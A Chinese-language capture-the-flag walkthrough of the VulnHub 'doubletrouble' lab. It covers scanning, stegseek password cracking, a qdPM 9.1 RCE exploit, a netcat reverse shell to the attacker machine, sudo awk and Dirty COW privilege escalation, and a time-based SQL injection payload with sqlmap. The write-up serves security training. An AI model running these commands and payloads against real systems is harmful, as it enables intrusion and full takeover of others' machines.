靶机: https://download.vulnhub.com/doubletrouble/doubletrouble.ova
难度: 中
目标: 取得两台靶机 root 权限 + Flag
涉及攻击方法:
- 主机发现
- 端口扫描
- WEB信息收集
- 开源CMS漏洞利用
- 隐写术
- EXP代码修复
- 密码爆破
- GTFObins提权
- SQL盲注
- 脏牛提权
一、主机发现
arp-scan -I eth0 -l
二、端口信息扫描
nmap -p- 10.1.1.217
nmap -p22,80 -sV -sC 10.1.1.217
三、web信息收集
查看网页源码发现使用qdPM 9.1CMS框架
四、qdPM 9.1CMS漏洞利用
搜索查看qdbm的历史漏洞
searchsploit qdbm
路径爬取
dirsearch -u http://10.1.1.217/
在 http://10.1.1.217//secret/ 下有个图片
secret : 秘密
五、隐写术
将图片下载下来,隐写术查看
steghide info doubletrouble.jpg
通过查看知道图片可以隐写4.7k的信息,并且存在密码
下载Deb格式的 StegSeek(需要用翻墙代理)
安装
apt install ./stegseek_0.6-1.deb
用字典爆破
copy字典
cp /usr/share/wordlists/rockyou.txt.gz .
解压字典
gunzip rockyou.txt.gz
爆破(stegseek爆破很快)
stegseek --crack doubletrouble.jpg rockyou.txt
提取隐写信息
tegseek --crack doubletrouble.jpg rockyou.txt -xf file
在提取出来的文件内发现了邮箱和一个字符串,尝试到登录后台
登录成功
利用poc进行攻击
cp /usr/share/exploitdb/exploits/php/webapps/47954.py .
cp /usr/share/exploitdb/exploits/php/webapps/50175.py .
使用50175.py进行远程代码 攻击利用
代码缩进存在问题,进行修复
漏洞利用
python3 50175.py -url http://10.1.1.217/ -u otisrush@localhost.com -p otis666
存在了一个后门文件
命令执行成功
反弹shell
nc -e /bin/bash 10.1.1.219 4444
升级shell
python -c "import pty; pty.spawn('/bin/bash')"
提权
sudo -l
awk进行提权
sudo awk 'BEGIN {system("/bin/sh")}'
提权成功
cd /root
发现ova文件
用nc进行文件传输
kali端命令:
nc -nvlp 4444 > second.ova
靶机端命令:
nc 10.1.1.219 4444 < doubletrouble.ova -w 1
用hash检测文件是否损坏,两边一致既正常
md5sum second.ova
安装second.ova
对second.ova进行探测
也是只开放了80,22端口
sql盲注
' AND (SELECT X FROM (SELECT (SLEEP(10)))X)#
用salmap跑库
sqlmap -r post.txt -p uname --dbms mysql --dbs
最后跑出两个账号密码
使用第二个账号密码登录服务器
脏牛漏洞提权
将EXP利用nc上传到目标靶机
提权步骤
给exp添加一个执行权限,运行exp会让输入一个密码,然后生成一个firefart的用户,就可以使用这个用户和刚设置的密码以root权限登录服务器
真实环境中需要将/tmp/passwd.bak文件copy回原来的/etc/passwd进行替换。
391
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
